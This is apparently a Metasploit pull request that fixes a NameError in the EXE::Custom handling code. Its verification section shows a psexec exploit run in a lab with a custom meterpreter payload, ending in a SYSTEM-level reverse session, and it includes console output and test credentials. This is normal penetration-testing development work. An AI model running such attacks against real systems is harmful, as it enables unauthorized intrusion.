### PR TITLE
fixes #4131, EXE::Custom NameError

### DIFF
--- a/lib/msf/core/exploit/exe.rb
+++ b/lib/msf/core/exploit/exe.rb
@@ -38,10 +38,11 @@ module Exploit::EXE
     obfus_eicar.join("-").upcase
   end
 
-  def get_custom_exe(path=nil)
+  def get_custom_exe(path = nil)
     path ||= datastore['EXE::Custom']
     print_status("Using custom payload #{path}, RHOST and RPORT settings will be ignored!")
     datastore['DisablePayloadHandler'] = true
+    exe = ''
     ::File.open(path,'rb') {|f| exe = f.read(f.stat.size)}
     exe
   end
@@ -160,7 +161,7 @@ protected
   end
 
   def exe_post_generation(opts)
-    if (opts[:fellback])
+    if opts[:fellback]
       print_status("Warning: Falling back to default template: #{opts[:fellback]}")
     end
   end

--- a/lib/msf/core/exploit/exe.rb
+++ b/lib/msf/core/exploit/exe.rb
@@ -42,7 +42,7 @@ module Exploit::EXE
     path ||= datastore['EXE::Custom']
     print_status("Using custom payload #{path}, RHOST and RPORT settings will be ignored!")
     datastore['DisablePayloadHandler'] = true
-    exe = ''
+    exe = nil
     ::File.open(path,'rb') {|f| exe = f.read(f.stat.size)}
     exe
   end


### PR DESCRIPTION
Fix #4131 with suggested fix basically.  exe could have been initialized as nil vs '', but it could then return nil vs ''.  I didn't see any callers that would have a problem with either one, but '' seemed safer than nil.  There's also one unrelated idiomatic ruby change that I couldn't ignore.
## Verification
- [ ] Travis is green
- [ ] Generate or pick a custom exe payload
- [ ] set EXE::Custom your_custom_pay.exe
- [ ] use exploit/windows/smb/psexec
- [ ] set all the options (other than payload)
- [ ] setup handler if necessary, and exploit, and don't get a stack trace

In the example below, I generated a reverse_tcp meterpreter and just used that as the custom payload, which is a little confusing seeming for psexec, but works nonetheless

```
msf exploit(psexec) > set EXE::Custom custom_met.exe
EXE::Custom => custom_met.exe
msf exploit(psexec) > unset PAYLOAD
Unsetting PAYLOAD...
msf exploit(psexec) > so

Module options (exploit/windows/smb/psexec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOST      192.168.66.133   yes       The target address
   RPORT      445              yes       Set the SMB service port
   SHARE      ADMIN$           yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain  WORKGROUP        no        The Windows domain to use for authentication
   SMBPass   TestP@ss       no        The password for the specified username
   SMBUser    TestUser              no        The username to authenticate as

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(psexec) > exploit

[*] Connecting to the server...
[*] Authenticating to 192.168.66.133:445|WORKGROUP as user 'ZDI'...
[*] Uploading payload...
[*] Using custom payload custom_met.exe, RHOST and RPORT settings will be ignored!
[*] Created \vODaJijQ.exe...
[*] 192.168.66.133:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.66.133[\svcctl] ...
[*] 192.168.66.133:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.66.133[\svcctl] ...
[*] 192.168.66.133:445 - Obtaining a service manager handle...
[*] 192.168.66.133:445 - Creating the service...
[*] 192.168.66.133:445 - Starting the service...
[*] Sending stage (770048 bytes) to 192.168.66.133
[*] Meterpreter session 1 opened (192.168.66.1:4444 -> 192.168.66.133:49160) at 2014-11-05 22:07:43 -0600
[-] 192.168.66.133:445 - Error starting service: execution expired
[*] Deleting \vODaJijQ.exe...
[-] Exploit failed: Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_CANNOT_DELETE (Command=6 WordCount=0)
msf exploit(psexec) > s

Active sessions
===============

  Id  Type                   Information                     Connection                                                  Via
  --  ----                   -----------                     ----------                                                  ---
  1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ ZDI-WIN7  192.168.66.1:4444 -> 192.168.66.133:49160 (192.168.66.133)  exploit/multi/handler
```
